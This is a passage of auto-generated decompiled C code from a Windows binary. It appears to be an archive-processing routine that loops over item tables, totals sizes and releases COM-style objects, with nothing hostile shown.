																							__eflags = _t1149;
																							if(_t1149 != 0) {
																								 *((intOrPtr*)( *_t1149 + 8))(_t1149);
																							}
																							 *(_t1785 - 4) = 0x1d;
																							E00407A18( *(_t1785 - 0xc0));
																							__eflags = _t1771 -  *(_t1785 - 0x20);
																							if(_t1771 <  *(_t1785 - 0x20)) {
																								_t1763 =  *(_t1785 - 0x20);
																								 *(_t1785 - 0x94) = 0;
																								 *(_t1785 - 0x90) = 0;
																								 *(_t1785 - 0xc0) = 0;
																								 *((intOrPtr*)(_t1785 - 0xbc)) = 0;
																								 *((intOrPtr*)(_t1785 - 0xb8)) = 0;
																								E00401E9A(_t1785 - 0xc0, 3);
																								 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																								__eflags =  *(_t1785 - 0x10) - _t1763;
																								 *(_t1785 - 4) = 0x1e;
																								if( *(_t1785 - 0x10) >= _t1763) {
																									goto L198;
																								}
																								goto L183;
																							} else {
																								goto L224;
																							}
																						}
																						_t1153 =  *(_t1785 - 0x10) << 2;
																						__eflags = _t1153;
																						 *(_t1785 - 0x38) = _t1153;
																						while(1) {
																							 *((intOrPtr*)(_t1785 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *(_t1785 - 0x38) +  *((intOrPtr*)(_t1785 - 0xf0))) * 4));
																							L0042EAC2(_t1785 - 0x124);
																							_t1158 =  *((intOrPtr*)(_t1785 - 0x58));
																							 *(_t1785 - 4) = 0x24;
																							__eflags =  *((char*)(_t1158 + 0x39));
																							_push(_t1785 - 0x2f4);
																							if( *((char*)(_t1158 + 0x39)) == 0) {
																								_push(_t1785 - 0x124);
																								_push( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x58)))));
																								E004308F5(_t1445);
																							} else {
																								_t1730 = _t1785 - 0x124;
																								L0043327A( *((intOrPtr*)(_t1785 - 0x58)), _t1730);
																							}
																							__eflags =  *((char*)(_t1785 - 0x2d0));
																							if(__eflags != 0) {
																								break;
																							}
																							__eflags =  *((char*)(_t1785 - 0x107));
																							if(__eflags != 0) {
																								break;
																							}
																							_t1179 =  *(_t1785 - 0x1c);
																							_t1543 =  *((intOrPtr*)(_t1179 + 0x48));
																							__eflags =  *((char*)(_t1543 + _t1769));
																							if( *((char*)(_t1543 + _t1769)) != 0) {
																								 *((intOrPtr*)(_t1785 - 0x118)) =  *((intOrPtr*)( *((intOrPtr*)(_t1179 + 0x5c)) + _t1769 * 4));
																								_t1547 =  *((intOrPtr*)(_t1179 + 0x70));
																								_t1181 =  *(_t1547 + _t1769 * 8);
																								 *(_t1785 - 0x124) = _t1181;
																								_t1548 =  *(_t1547 + 4 + _t1769 * 8);
																								__eflags = _t1181 | _t1548;
																								 *(_t1785 - 0x120) = _t1548;
																								if((_t1181 | _t1548) == 0) {
																									 *(_t1785 - 0x106) =  *(_t1785 - 0x106) & 0x00000000;
																									_t738 = _t1785 - 0x108;
																									 *_t738 =  *(_t1785 - 0x108) & 0x00000000;
																									__eflags =  *_t738;
																								} else {
																									 *(_t1785 - 0x18) =  *(_t1785 - 0x18) + 1;
																									 *(_t1785 - 0x106) = 1;
																									 *(_t1785 - 0x108) = 1;
																								}
																								_push(_t1785 - 0x2f4);
																								_push(_t1785 - 0x124);
																								E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																							}
																							 *(_t1785 - 4) = 0x22;
																							E00407A18( *((intOrPtr*)(_t1785 - 0x114)));
																							 *(_t1785 - 0x38) =  *(_t1785 - 0x38) + 4;
																							_t1769 = _t1769 + 1;
																							__eflags = _t1769 -  *(_t1785 + 0x14);
																							if(__eflags < 0) {
																								continue;
																							} else {
																								goto L221;
																							}
																						}
																						E00407A18( *((intOrPtr*)(_t1785 - 0x114)));
																						 *(_t1785 - 4) = 0x21;
																						L0042B864(_t1785 - 0x3a4, __eflags);
																						_t1165 =  *(_t1785 - 0x1c);
																						 *(_t1785 - 4) = 0x1e;
																						__eflags = _t1165;
																						if(_t1165 != 0) {
																							 *((intOrPtr*)( *_t1165 + 8))(_t1165);
																						}
																						E00407A18( *(_t1785 - 0xc0));
																						 *(_t1785 - 4) = 0x1c;
																						E00408604(_t1785 - 0xfc);
																						 *(_t1785 - 4) = 0xf;
																						E00408604(_t1785 - 0x138);
																						 *(_t1785 - 4) = 0xe;
																						E00428A47(_t1785 - 0x4cc);
																						 *(_t1785 - 4) = 5;
																						E00428510(_t1785 - 0x1b4, __eflags);
																						 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																						 *(_t1785 - 4) = 0x25;
																						E0040862D();
																						 *(_t1785 - 4) = 4;
																						E00408604(_t1785 - 0x4c);
																						 *(_t1785 - 4) = 3;
																						L0043353F(_t1785 - 0x2cc, __eflags);
																						__eflags = _t1746;
																						 *(_t1785 - 4) = 1;
																						if(_t1746 != 0) {
																							 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																						}
																						 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																						E00408604(_t1785 - 0xb4);
																						 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																						E00408604(_t1785 - 0xd4);
																						_t1076 = 0x80004005;
																					}
																					goto L286;
																				}
																				L198:
																				 *(_t1785 + 0x14) = 1;
																				goto L199;
																			}
																		}
																		_t590 = _t1785 + 0x14;
																		 *_t590 =  *(_t1785 + 0x14) & 0x00000000;
																		__eflags =  *_t590;
																		 *(_t1785 - 0x18) = _t1763;
																		do {
																			E00415C6D(_t1785 - 0xfc,  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1785 - 0x12c)) + 4)));
																			 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 0x14;
																			_t600 = _t1785 - 0x18;
																			 *_t600 =  *(_t1785 - 0x18) - 1;
																			__eflags =  *_t600;
																		} while ( *_t600 != 0);
																		goto L179;
																	} else {
																		goto L174;
																	}
																	do {
																		L174:
																		_push( *(_t1785 - 0x9c));
																		_t1206 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x58)) + 0xc)) +  *(_t1785 - 0x10) * 4);
																		_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1206 * 4)));
																		_push(_t1206);
																		_t1207 = L00432D91(_t1785 - 0x3b8);
																		_t1790 = _t1788 - 0x14;
																		_t1573 = 5;
																		memcpy(_t1790, _t1207, _t1573 << 2);
																		_t1788 = _t1790 + 0xc;
																		L00433730(_t1785 - 0x138);
																		 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																		__eflags =  *(_t1785 - 0x10) -  *(_t1785 - 0x20);
																	} while ( *(_t1785 - 0x10) <  *(_t1785 - 0x20));
																	_t1746 =  *(_t1785 - 0x68);
																	_t1763 =  *(_t1785 - 0x20);
																	goto L176;
																}
																__eflags =  *(_t1785 - 0x70) - 1;
																if( *(_t1785 - 0x70) <= 1) {
																	_t561 = _t1785 - 0x9c;
																	 *_t561 =  *(_t1785 - 0x9c) & 0x00000000;
																	__eflags =  *_t561;
																	goto L173;
																}
																goto L171;
															} else {
																_t1212 = _t1062 + _t1062 * 2 << 2;
																 *(_t1785 - 0x1c) = _t1212;
																while(1) {
																	_t1213 = _t1212 +  *((intOrPtr*)(_t1785 - 0xa8));
																	 *(_t1785 - 0x38) = _t1213;
																	__eflags =  *((intOrPtr*)(_t1213 + 4)) -  *(_t1785 - 0x2c);
																	if( *((intOrPtr*)(_t1213 + 4)) !=  *(_t1785 - 0x2c)) {
																		goto L168;
																	}
																	_t1577 =  *(_t1785 - 0x38);
																	_t1733 =  *((intOrPtr*)(_t1445 + 0x5c));
																	_t1215 =  *_t1577;
																	_t1774 =  *_t1577 << 2;
																	__eflags = _t1577[2] -  *((intOrPtr*)(_t1774 + _t1733));
																	if(_t1577[2] !=  *((intOrPtr*)(_t1774 + _t1733))) {
																		L004329C5(_t1785 - 0x1d4);
																		 *(_t1785 - 4) = 0x11;
																		_t1217 = L0040F595(_t1785 - 0x1d4);
																		__eflags = _t1217;
																		 *(_t1785 + 0x14) = _t1217;
																		if(_t1217 != 0) {
																			 *(_t1785 - 4) = 0xf;
																			L00423D3B(_t1785 - 0x1d4);
																			 *(_t1785 - 4) = 0xe;
																			E00428A47(_t1785 - 0x4cc);
																			 *(_t1785 - 4) = 5;
																			E00428510(_t1785 - 0x1b4, __eflags);
																			 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																			 *(_t1785 - 4) = 0x12;
																			E0040862D();
																			 *(_t1785 - 4) = 4;
																			E00408604(_t1785 - 0x4c);
																			 *(_t1785 - 4) = 3;
																			L0043353F(_t1785 - 0x2cc, __eflags);
																			__eflags = _t1746;
																			 *(_t1785 - 4) = 1;
																			if(_t1746 != 0) {
																				 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																			}
																			_t1765 =  *(_t1785 + 0x14);
																			goto L285;
																		}
																		 *(_t1785 + 0x20) =  *(_t1785 + 0x20) & _t1217;
																		 *(_t1785 - 0x64) =  *(_t1785 - 0x64) & _t1217;
																		_push(_t1785 + 0x20);
																		_push(_t1785 - 0x64);
																		 *(_t1785 - 4) = 0x14;
																		L0040F5DB(_t1785 - 0x1d4);
																		E00404AD0(_t1785 - 0xe8, 1);
																		 *((intOrPtr*)(_t1785 - 0xe8)) = 0x47ab08;
																		 *(_t1785 - 0x20) =  *(_t1785 - 0x20) & 0x00000000;
																		 *(_t1785 - 4) = 0x15;
																		_t1589 =  *(_t1774 +  *((intOrPtr*)(_t1445 + 0x5c)));
																		__eflags = _t1589;
																		_t1232 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774);
																		 *(_t1785 - 0x18) = _t1589;
																		if(_t1589 <= 0) {
																			L146:
																			_t1235 = E00430EFB( *((intOrPtr*)(_t1785 - 0x2b0)), _t1785, _t1445,  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774), _t1785 - 0xe8,  *(_t1785 + 0x20));
																			__eflags = _t1235;
																			 *(_t1785 + 0x14) = _t1235;
																			if(_t1235 != 0) {
																				 *(_t1785 - 4) = 0x14;
																				E00408604(_t1785 - 0xe8);
																				_t1237 =  *(_t1785 - 0x64);
																				 *(_t1785 - 4) = 0x13;
																				__eflags = _t1237;
																				if(_t1237 != 0) {
																					 *((intOrPtr*)( *_t1237 + 8))(_t1237);
																				}
																				_t1238 =  *(_t1785 + 0x20);
																				 *(_t1785 - 4) = 0x11;
																				__eflags = _t1238;
																				if(_t1238 != 0) {
																					 *((intOrPtr*)( *_t1238 + 8))(_t1238);
																				}
																				 *(_t1785 - 4) = 0xf;
																				L00423D3B(_t1785 - 0x1d4);
																				 *(_t1785 - 4) = 0xe;
																				E00428A47(_t1785 - 0x4cc);
																				 *(_t1785 - 4) = 5;
																				E00428510(_t1785 - 0x1b4, __eflags);
																				 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																				 *(_t1785 - 4) = 0x16;
																				E0040862D();
																				 *(_t1785 - 4) = 4;
																				E00408604(_t1785 - 0x4c);
																				 *(_t1785 - 4) = 3;
																				L0043353F(_t1785 - 0x2cc, __eflags);
																				__eflags = _t1746;
																				 *(_t1785 - 4) = 1;
																				if(_t1746 != 0) {
																					 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																				}
																				_t1765 =  *(_t1785 + 0x14);
																				goto L285;
																			}
																			_t1249 =  *(_t1785 + 0x20);
																			__eflags = _t1249;
																			if(_t1249 != 0) {
																				 *((intOrPtr*)( *_t1249 + 8))(_t1249);
																				_t420 = _t1785 + 0x20;
																				 *_t420 =  *(_t1785 + 0x20) & 0x00000000;
																				__eflags =  *_t420;
																			}
																			E0040C9B4(_t1785 - 0x2b4,  *((intOrPtr*)(_t1785 - 0x98)));
																			_t1601 =  *((intOrPtr*)(_t1445 + 0x17c));
																			 *(_t1785 - 0x298) =  *( *((intOrPtr*)(_t1445 + 0x48)) + _t1774);
																			_t1254 =  *((intOrPtr*)(_t1445 + 0x190)) + _t1774;
																			 *(_t1785 + 0x14) = _t1254;
																			_t1255 =  *_t1254;
																			_t1730 =  *((intOrPtr*)(_t1601 + _t1255 * 8)) +  *((intOrPtr*)(_t1445 + 0x148));
																			asm("adc eax, [ebx+0x14c]");
																			 *(_t1785 - 0x2a4) = _t1730;
																			 *((intOrPtr*)(_t1785 - 0x2a0)) =  *((intOrPtr*)(_t1601 + 4 + _t1255 * 8));
																			 *((intOrPtr*)(_t1785 - 0x29c)) =  *((intOrPtr*)(_t1445 + 0xc)) +  *( *(_t1785 + 0x14)) * 8;
																			L0040FBD7(_t1785 - 0x2cc);
																			 *(_t1785 + 0x14) =  *( *((intOrPtr*)(_t1785 + 0x10)) + 8);
																			E0042DB56(_t1785 - 0x34c);
																			_push(_t1746);
																			_push( *((intOrPtr*)(_t1785 + 0x10)));
																			 *(_t1785 - 4) = 0x17;
																			_push( *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50));
																			_push(_t1785 - 0x34c);
																			_push(_t1785 - 0x34);
																			_push(0);
																			_push( *(_t1785 - 0x64));
																			_t1268 = L004279E7(_t1785 - 0x4cc, _t1730, __eflags);
																			__eflags = _t1268;
																			 *(_t1785 - 0x18) = _t1268;
																			if(__eflags != 0) {
																				 *(_t1785 - 4) = 0x15;
																				L0042B864(_t1785 - 0x34c, __eflags);
																				 *(_t1785 - 4) = 0x14;
																				E00408604(_t1785 - 0xe8);
																				_t1271 =  *(_t1785 - 0x64);
																				 *(_t1785 - 4) = 0x13;
																				__eflags = _t1271;
																				if(_t1271 != 0) {
																					 *((intOrPtr*)( *_t1271 + 8))(_t1271);
																				}
																				_t1272 =  *(_t1785 + 0x20);
																				 *(_t1785 - 4) = 0x11;
																				__eflags = _t1272;
																				if(_t1272 != 0) {
																					 *((intOrPtr*)( *_t1272 + 8))(_t1272);
																				}
																				 *(_t1785 - 4) = 0xf;
																				L00423D3B(_t1785 - 0x1d4);
																				 *(_t1785 - 4) = 0xe;
																				E00428A47(_t1785 - 0x4cc);
																				 *(_t1785 - 4) = 5;
																				E00428510(_t1785 - 0x1b4, __eflags);
																				 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																				 *(_t1785 - 4) = 0x18;
																				E0040862D();
																				 *(_t1785 - 4) = 4;
																				E00408604(_t1785 - 0x4c);
																				 *(_t1785 - 4) = 3;
																				L0043353F(_t1785 - 0x2cc, __eflags);
																				__eflags = _t1746;
																				 *(_t1785 - 4) = 1;
																				if(_t1746 != 0) {
																					 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																				}
																				_t1765 =  *(_t1785 - 0x18);
																				goto L285;
																			} else {
																				L00467AC0( *((intOrPtr*)(_t1785 - 0x2c4)));
																				__eflags =  *(_t1785 - 0x2b8);
																				if(__eflags != 0) {
																					_t1765 =  *(_t1785 - 0x2b8);
																					 *(_t1785 - 4) = 0x15;
																					L0042B864(_t1785 - 0x34c, __eflags);
																					 *(_t1785 - 4) = 0x14;
																					E00408604(_t1785 - 0xe8);
																					_t1286 =  *(_t1785 - 0x64);
																					 *(_t1785 - 4) = 0x13;
																					__eflags = _t1286;
																					if(_t1286 != 0) {
																						 *((intOrPtr*)( *_t1286 + 8))(_t1286);
																					}
																					_t1287 =  *(_t1785 + 0x20);
																					 *(_t1785 - 4) = 0x11;
																					__eflags = _t1287;
																					if(_t1287 != 0) {
																						 *((intOrPtr*)( *_t1287 + 8))(_t1287);
																					}
																					 *(_t1785 - 4) = 0xf;
																					L00423D3B(_t1785 - 0x1d4);
																					 *(_t1785 - 4) = 0xe;
																					E00428A47(_t1785 - 0x4cc);
																					 *(_t1785 - 4) = 5;
																					E00428510(_t1785 - 0x1b4, __eflags);
																					 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																					 *(_t1785 - 4) = 0x19;
																					E0040862D();
																					 *(_t1785 - 4) = 4;
																					E00408604(_t1785 - 0x4c);
																					goto L255;
																				}
																				_t1627 =  *((intOrPtr*)(_t1785 + 0x10));
																				_t1298 =  *(_t1785 + 0x14);
																				__eflags = _t1298 -  *((intOrPtr*)(_t1627 + 8));
																				if(_t1298 >=  *((intOrPtr*)(_t1627 + 8))) {
																					L154:
																					 *((intOrPtr*)(_t1746 + 0x20)) =  *((intOrPtr*)(_t1746 + 0x20)) + E00429826(_t1785 - 0x34c);
																					_push(_t1785 - 0x34c);
																					_t1301 =  *((intOrPtr*)(_t1785 + 0x10));
																					asm("adc [edi+0x24], edx");
																					_t478 = _t1301 + 0x3c; // 0x3c
																					L0042F063(_t478);
																					 *(_t1785 - 4) = 0x15;
																					L0042B864(_t1785 - 0x34c, __eflags);
																					 *(_t1785 - 4) = 0x14;
																					E00408604(_t1785 - 0xe8);
																					_t1305 =  *(_t1785 - 0x64);
																					 *(_t1785 - 4) = 0x13;
																					__eflags = _t1305;
																					if(_t1305 != 0) {
																						 *((intOrPtr*)( *_t1305 + 8))(_t1305);
																					}
																					_t1306 =  *(_t1785 + 0x20);
																					 *(_t1785 - 4) = 0x11;
																					__eflags = _t1306;
																					if(_t1306 != 0) {
																						 *((intOrPtr*)( *_t1306 + 8))(_t1306);
																					}
																					 *(_t1785 - 4) = 0xf;
																					L00423D3B(_t1785 - 0x1d4);
																					L159:
																					_t494 =  *((intOrPtr*)(_t1785 + 0x10)) + 0x50; // 0x50
																					E00415C6D(_t494,  *((intOrPtr*)( *(_t1785 - 0x38) + 8)));
																					 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																					_t1312 =  *(_t1774 +  *((intOrPtr*)(_t1445 + 0x5c)));
																					_t1775 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774);
																					__eflags = _t1312;
																					 *(_t1785 - 0x38) = _t1312;
																					if(_t1312 <= 0) {
																						L167:
																						 *(_t1785 - 0x24) =  *(_t1785 - 0x24) + 1;
																						 *(_t1785 - 0x1c) =  *(_t1785 - 0x1c) + 0xc;
																						__eflags =  *(_t1785 - 0x24) -  *(_t1785 - 0xac);
																						if( *(_t1785 - 0x24) <  *(_t1785 - 0xac)) {
																							_t1212 =  *(_t1785 - 0x1c);
																							continue;
																						}
																						goto L168;
																					} else {
																						goto L160;
																					}
																					do {
																						L160:
																						L0042EAC2(_t1785 - 0x178);
																						 *(_t1785 - 4) = 0x1a;
																						E004308F5(_t1445, _t1775, _t1785 - 0x178, _t1785 - 0x1fc);
																						__eflags =  *((char*)(_t1785 - 0x15c));
																						if( *((char*)(_t1785 - 0x15c)) != 0) {
																							 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 1;
																							_t1321 =  *( *((intOrPtr*)(_t1785 - 0xc8)) + _t1775 * 4);
																							__eflags = _t1321;
																							if(_t1321 >= 0) {
																								_t1322 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1321 * 4);
																								 *(_t1785 - 0x18) = _t1322;
																								__eflags =  *((char*)(_t1322 + 0x38));
																								if( *((char*)(_t1322 + 0x38)) == 0) {
																									__eflags =  *((char*)(_t1322 + 0x39));
																									if( *((char*)(_t1322 + 0x39)) != 0) {
																										L0042EAC2(_t1785 - 0x158);
																										_push(_t1785 - 0x1fc);
																										_t1730 = _t1785 - 0x158;
																										 *(_t1785 - 4) = 0x1b;
																										L0043327A( *(_t1785 - 0x18), _t1730);
																										 *(_t1785 - 0x158) =  *((intOrPtr*)(_t1785 - 0x178));
																										 *((intOrPtr*)(_t1785 - 0x154)) =  *((intOrPtr*)(_t1785 - 0x174));
																										 *((intOrPtr*)(_t1785 - 0x14c)) =  *((intOrPtr*)(_t1785 - 0x16c));
																										 *((char*)(_t1785 - 0x13a)) =  *((intOrPtr*)(_t1785 - 0x15a));
																										 *((char*)(_t1785 - 0x13c)) =  *((intOrPtr*)(_t1785 - 0x15c));
																										E00430A06(_t1785 - 0x178, _t1785 - 0x158);
																										 *(_t1785 - 4) = 0x1a;
																										E00407A18( *((intOrPtr*)(_t1785 - 0x148)));
																									}
																									_push(_t1785 - 0x1fc);
																									_push(_t1785 - 0x178);
																									E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																								}
																							}
																						}
																						 *(_t1785 - 4) = 0xf;
																						E00407A18( *((intOrPtr*)(_t1785 - 0x168)));
																						_t1775 = _t1775 + 1;
																						__eflags =  *(_t1785 + 0x14) -  *(_t1785 - 0x38);
																					} while ( *(_t1785 + 0x14) <  *(_t1785 - 0x38));
																					goto L167;
																				} else {
																					goto L152;
																				}
																				do {
																					L152:
																					_t1730 =  *( *((intOrPtr*)(_t1627 + 0xc)) + _t1298 * 8);
																					 *((intOrPtr*)(_t1746 + 0x28)) =  *((intOrPtr*)(_t1746 + 0x28)) + _t1730;
																					asm("adc [edi+0x2c], ecx");
																					_t1627 =  *((intOrPtr*)(_t1785 + 0x10));
																					_t1298 = _t1298 + 1;
																					__eflags = _t1298 -  *((intOrPtr*)(_t1627 + 8));
																				} while (_t1298 <  *((intOrPtr*)(_t1627 + 8)));
																				 *(_t1785 + 0x14) = _t1298;
																				goto L154;
																			}
																		}
																		_t1340 = _t1232 << 2;
																		 *(_t1785 + 0x14) = _t1340;
																		while(1) {
																			 *(_t1785 - 0x5c) =  *(_t1785 - 0x5c) & 0x00000000;
																			_t1651 =  *((intOrPtr*)( *((intOrPtr*)(_t1445 + 0x70)) + _t1340));
																			__eflags =  *((char*)(_t1651 + 0x1c));
																			if( *((char*)(_t1651 + 0x1c)) != 0) {
																				 *(_t1785 - 0x20) =  *(_t1785 - 0x20) + 1;
																				_t1343 =  *(_t1340 +  *((intOrPtr*)(_t1785 - 0xc8)));
																				__eflags = _t1343;
																				if(_t1343 >= 0) {
																					_t1344 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1343 * 4));
																					__eflags =  *((char*)(_t1344 + 0x38));
																					if( *((char*)(_t1344 + 0x38)) == 0) {
																						 *(_t1785 - 0x5c) = 1;
																					}
																				}
																			}
																			L0043AC2F(_t1785 - 0xe8,  *(_t1785 - 0x5c));
																			 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 4;
																			__eflags =  *(_t1785 - 0x20) -  *(_t1785 - 0x18);
																			if( *(_t1785 - 0x20) >=  *(_t1785 - 0x18)) {
																				goto L146;
																			}
																			_t1340 =  *(_t1785 + 0x14);
																		}
																		goto L146;
																	}
																	_t1345 = E00429872(_t1445, _t1215);
																	_t1657 =  *((intOrPtr*)(_t1445 + 0x17c));
																	 *((intOrPtr*)(_t1785 - 0x104)) = _t1345;
																	_push(_t1746);
																	_push(_t1733);
																	_push(_t1345);
																	 *((intOrPtr*)(_t1785 - 0x100)) = _t1733;
																	_t1347 =  *( *((intOrPtr*)(_t1445 + 0x190)) + _t1774);
																	asm("adc eax, [ebx+0x14c]");
																	_push( *((intOrPtr*)(_t1657 + 4 + _t1347 * 8)));
																	_push( *((intOrPtr*)(_t1657 + _t1347 * 8)) +  *((intOrPtr*)(_t1445 + 0x148)));
																	_t1730 =  *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50);
																	_t1350 = L00432A5E( *((intOrPtr*)(_t1785 - 0x98)), _t1730);
																	__eflags = _t1350;
																	 *(_t1785 + 0x14) = _t1350;
																	if(_t1350 != 0) {
																		 *(_t1785 - 4) = 0xe;
																		E00428A47(_t1785 - 0x4cc);
																		 *(_t1785 - 4) = 5;
																		E00428510(_t1785 - 0x1b4, __eflags);
																		 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																		 *(_t1785 - 4) = 0x10;
																		E0040862D();
																		 *(_t1785 - 4) = 4;
																		E00408604(_t1785 - 0x4c);
																		 *(_t1785 - 4) = 3;
																		L0043353F(_t1785 - 0x2cc, __eflags);
																		__eflags = _t1746;
																		 *(_t1785 - 4) = 1;
																		if(_t1746 != 0) {
																			 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																		}
																		 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																		E00408604(_t1785 - 0xb4);
																		 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																		E00408604(_t1785 - 0xd4);
																		_t1076 =  *(_t1785 + 0x14);
																		goto L286;
																	}
																	 *((intOrPtr*)(_t1746 + 0x18)) =  *((intOrPtr*)(_t1746 + 0x18)) +  *((intOrPtr*)(_t1785 - 0x104));
																	asm("adc [edi+0x1c], eax");
																	 *(_t1785 - 0x20) =  *(_t1785 - 0x20) & 0x00000000;
																	_t1363 =  *( *((intOrPtr*)(_t1445 + 0x48)) + _t1774);
																	_t1667 =  *( *((intOrPtr*)(_t1445 + 0x190)) + _t1774);
																	 *(_t1785 - 0x18) = _t1363;
																	__eflags =  *(_t1363 + 0x30);
																	if( *(_t1363 + 0x30) <= 0) {
																		L136:
																		_t1364 =  *((intOrPtr*)(_t1785 + 0x10));
																		_push( *(_t1785 - 0x18));
																		_t366 = _t1364 + 0x3c; // 0x3c
																		L0042F063(_t366);
																		goto L159;
																	}
																	_t1367 = _t1667 << 3;
																	__eflags = _t1367;
																	 *(_t1785 + 0x14) = _t1367;
																	do {
																		L0042389F( *((intOrPtr*)(_t1785 + 0x10)),  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1445 + 0xc)))),  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1445 + 0xc)) + 4)));
																		 *(_t1785 - 0x20) =  *(_t1785 - 0x20) + 1;
																		_t1371 =  *(_t1785 - 0x18);
																		 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 8;
																		__eflags =  *(_t1785 - 0x20) -  *((intOrPtr*)(_t1371 + 0x30));
																	} while ( *(_t1785 - 0x20) <  *((intOrPtr*)(_t1371 + 0x30)));
																	goto L136;
																}
																goto L168;
															}
															L225:
															 *(_t1785 - 4) = 0xe;
															E00428A47(_t1785 - 0x4cc);
															 *(_t1785 - 4) = 5;
															E00428510(_t1785 - 0x1b4, __eflags);
															 *(_t1785 - 0x2c) =  *(_t1785 - 0x2c) + 1;
															__eflags =  *(_t1785 - 0x2c) - 4;
														} while ( *(_t1785 - 0x2c) < 4);
														__eflags =  *(_t1785 - 0x24) -  *(_t1785 - 0xac);
														if( *(_t1785 - 0x24) ==  *(_t1785 - 0xac)) {
															 *(_t1785 - 0x7c) = 4;
															 *((intOrPtr*)(_t1785 - 0x88)) = 0;
															 *(_t1785 - 0x84) = 0;
															 *((intOrPtr*)(_t1785 - 0x80)) = 0;
															 *((intOrPtr*)(_t1785 - 0x8c)) = 0x47a668;
															_t1764 =  *((intOrPtr*)(_t1785 + 8));
															 *(_t1785 - 4) = 0x27;
															 *(_t1785 - 0x10) = 0;
															__eflags =  *(_t1764 + 8);
															if( *(_t1764 + 8) <= 0) {
																L277:
																E00419600(_t1785 - 0x8c, _t1730, 0x432d40, _t1764);
																 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																__eflags =  *(_t1785 - 0x84);
																if( *(_t1785 - 0x84) <= 0) {
																	L282:
																	 *(_t1785 - 4) = 5;
																	E00408604(_t1785 - 0x8c);
																	L004329D2( *((intOrPtr*)(_t1785 + 0x10)));
																	 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																	 *(_t1785 - 4) = 0x29;
																	E0040862D();
																	 *(_t1785 - 4) = 4;
																	E00408604(_t1785 - 0x4c);
																	 *(_t1785 - 4) = 3;
																	L0043353F(_t1785 - 0x2cc, __eflags);
																	__eflags = _t1746;
																	 *(_t1785 - 4) = 1;
																	if(_t1746 != 0) {
																		 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																	}
																	_t1765 = 0;
																	__eflags = 0;
																	goto L285;
																} else {
																	goto L278;
																}
																do {
																	L278:
																	_t1767 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0x80)) +  *(_t1785 - 0x10) * 4) * 4));
																	L0042EAC2(_t1785 - 0x158);
																	__eflags =  *((char*)(_t1767 + 0x39));
																	 *(_t1785 - 4) = 0x28;
																	_push(_t1785 - 0x1fc);
																	if( *((char*)(_t1767 + 0x39)) == 0) {
																		_push(_t1785 - 0x158);
																		_push( *_t1767);
																		E004308F5(_t1445);
																	} else {
																		L0043327A(_t1767, _t1785 - 0x158);
																	}
																	_push(_t1785 - 0x1fc);
																	_push(_t1785 - 0x158);
																	E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																	 *(_t1785 - 4) = 0x27;
																	E00407A18( *((intOrPtr*)(_t1785 - 0x148)));
																	 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																	__eflags =  *(_t1785 - 0x10) -  *(_t1785 - 0x84);
																} while ( *(_t1785 - 0x10) <  *(_t1785 - 0x84));
																goto L282;
															} else {
																goto L268;
															}
															do {
																L268:
																_t1092 =  *( *((intOrPtr*)(_t1764 + 0xc)) +  *(_t1785 - 0x10) * 4);
																__eflags = _t1092[0xe];
																if(_t1092[0xe] == 0) {
																	_t1093 =  *_t1092;
																	__eflags = _t1093 - 0xffffffff;
																	if(_t1093 == 0xffffffff) {
																		L275:
																		E00415C6D(_t1785 - 0x8c,  *(_t1785 - 0x10));
																		goto L276;
																	}
																	__eflags =  *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t1445 + 0x70)) + _t1093 * 4)) + 0x1c));
																	L274:
																	if(__eflags != 0) {
																		goto L276;
																	}
																	goto L275;
																}
																__eflags = _t1092[0xe];
																if(_t1092[0xe] != 0) {
																	goto L275;
																}
																__eflags = _t1092[0xe];
																if(__eflags != 0) {
																	goto L275;
																}
																goto L274;
																L276:
